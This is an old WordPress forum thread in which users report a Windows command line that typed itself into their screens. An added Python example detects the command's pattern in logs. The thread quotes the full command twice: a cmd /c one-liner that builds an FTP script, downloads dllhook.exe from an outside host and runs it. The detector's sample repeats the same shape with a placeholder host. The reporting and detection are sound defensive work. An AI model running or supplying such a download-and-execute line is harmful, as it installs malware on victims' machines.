
possible malicious attack within WordPress admin panel (4 posts)

  1. GauravG
    Member
    Posted 3 years ago #

    hi.
    i just updated my blog to v2.7
    i had to edit my sidebar content so i opened the theme editor and something really weird started to happen.
    as soon as i clicked within the textfield, some text automatically started to appear at the cursor.

    cmd c echo open ftp.dopedgod.com 21>> ik & echo user bot@dopedgod.com botpass>> ik & echo binary>> ik & echo get dllhook.exe>> ik & echo bye>> ik & ftp-n-v-s: ik of ik & & & exit dllhook.exe
    echo You got owned

    this seems like windows batch code to connect to a server and download an executable and execute it. and display the message You got owned.

    i have absolutely no idea what could have caused this, this is the first time ever i have been a victim of such a malicious attack, i'm always careful to update my antivirus and other protection.

    funniest thing is, i'm on Mac OS X 10.5.3 right now so the code has no potential harm for the system. what's bugging me is how could this have happened.

    system info:
    OS: Mac OS X 10.5.3
    Browser: Firefox 3.0.5 with AdBlock Plus

  2. whooami
    Member
    Posted 3 years ago #

    and where is your blog, please? url?

  3. Kaposbr
    Member
    Posted 3 years ago #

    hey - i got this message on my "google talk" account - i had a chat window open and when i got back to my computer, i wrote this message

    "cmd /c echo open http://ftp.dopedgod.com 21 >> ik &echo user bot@dopedgod.com botpass >> ik &echo binary >> ik &echo get dllhook.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &dllhook.exe &exit
    echo You got owned"

    Did you already find out how this happened to you?

    Greets and merry xmas

    Kapo

  4. shifuimam
    Member
    Posted 2 years ago #

    http://ubuntuforums.org/showthread.php?t=980832

    This appears to be an exploit with VNC. Disable Apple Remote Desktop in OS X (or VNC in Linux or Windows).

Topic Closed

This topic has been closed to new replies.
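
Added example, not part of the original thread: a small detector for the command shape quoted in the posts above (a `cmd /c` line that echoes an FTP script into a file, runs `ftp -s:` on it, then starts the fetched file), usable over process-creation or shell-history logs. The function names and the sample command (host `ftp.example.test`, file `payload.exe`) are constructed for illustration.

```python
import re

# "echo <text> >> <file>": one line appended to a script file
ECHO_APPEND = re.compile(r"^echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)$", re.I)
# "ftp ... -s:<file>": ftp.exe reads its commands from <file>
FTP_SCRIPT = re.compile(r"^ftp(?:\.exe)?\b.*?-s:\s*(?P<file>\S+)", re.I)

def second_word(lines, verb):
    """Arguments of script lines starting with verb, e.g. 'get x.exe' -> 'x.exe'."""
    out = []
    for line in lines:
        words = line.split()
        if len(words) > 1 and words[0].lower() == verb:
            out.append(words[1])
    return out

def analyze(cmdline):
    """Return a finding if cmdline echoes an FTP script to a file and runs it."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    scripts, finding = {}, None
    for part in (p.strip() for p in body.split("&")):
        if not part:
            continue
        echo, ftp = ECHO_APPEND.match(part), FTP_SCRIPT.match(part)
        if echo:
            # Remember every line written to each script file
            scripts.setdefault(echo["file"].lower(), []).append(echo["text"])
        elif ftp and ftp["file"].lower() in scripts:
            # ftp is being driven by a file this same command line just built
            lines = scripts[ftp["file"].lower()]
            finding = {"script": ftp["file"], "hosts": second_word(lines, "open"),
                       "fetched": second_word(lines, "get"), "executed": []}
        elif finding and part.split()[0].lower() in (
                f.lower() for f in finding["fetched"]):
            # A later step launches a file the FTP script downloaded
            finding["executed"].append(part.split()[0])
    return finding

# Constructed sample, modelled on the command quoted in the thread
SAMPLE = ("cmd /c echo open ftp.example.test 21 >> ik &echo user bot@example.test "
          "botpass >> ik &echo binary >> ik &echo get payload.exe >> ik "
          "&echo bye >> ik &ftp -n -v -s:ik &del ik &payload.exe &exit")

if __name__ == "__main__":
    print(analyze(SAMPLE))
    print(analyze("ftp -s:upload.txt"))  # ftp script not built by echo: no finding
```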
